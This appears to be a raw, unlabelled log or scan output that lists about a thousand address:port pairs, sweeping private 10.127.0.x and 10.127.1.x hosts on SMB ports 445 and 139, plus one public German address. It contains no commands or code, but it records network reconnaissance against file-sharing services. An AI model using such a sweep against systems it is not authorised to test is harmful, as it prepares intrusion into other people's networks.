N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.67:139 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.254:139 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.6:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.12:139 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.18:139 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.24:139 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.32:139 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.38:139 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.39:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.43:139 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.45:139 tcp
N/A 10.127.1.46:445 tcp
DE 136.243.76.21:445 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.1.50:445 tcp
N/A 10.127.1.50:139 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.53:139 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.56:139 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.57:139 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.58:139 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.59:139 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.63:139 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.65:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.71:139 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.78:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.79:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.1.85:139 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.89:139 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.90:139 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.91:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.92:139 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.93:139 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.94:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.95:139 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.96:139 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.97:139 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.1.98:139 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.99:139 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.100:139 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.1.101:139 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.102:139 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.103:139 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.104:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.105:139 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.106:139 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.107:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.108:139 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.109:139 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.110:139 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.1.111:139 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.112:139 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.113:139 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.1.114:139 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.115:139 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.116:139 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.117:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.118:139 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.119:139 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.120:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.121:139 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.122:139 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.123:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.124:139 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.125:139 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.126:139 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.1.127:139 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.128:139 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.129:139 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.1.130:139 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.131:139 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.132:139 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.133:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.134:139 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.135:139 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.136:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.137:139 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.138:139 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.139:139 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.1.140:139 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.141:139 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.142:139 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.1.143:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.144:139 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.145:139 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.146:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.147:139 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.148:139 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.149:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.150:139 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.151:139 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.152:139 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.1.153:139 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.154:139 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.155:139 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.1.156:139 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.157:139 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.158:139 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.159:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.160:139 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.161:139 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.162:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.163:139 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.164:139 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.165:139 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.1.166:139 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.167:139 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.168:139 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.1.169:139 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.170:139 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.171:139 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.1.172:139 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.173:139 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.174:139 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.175:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.176:139 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.177:139 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.178:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.179:139 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.180:139 tcp
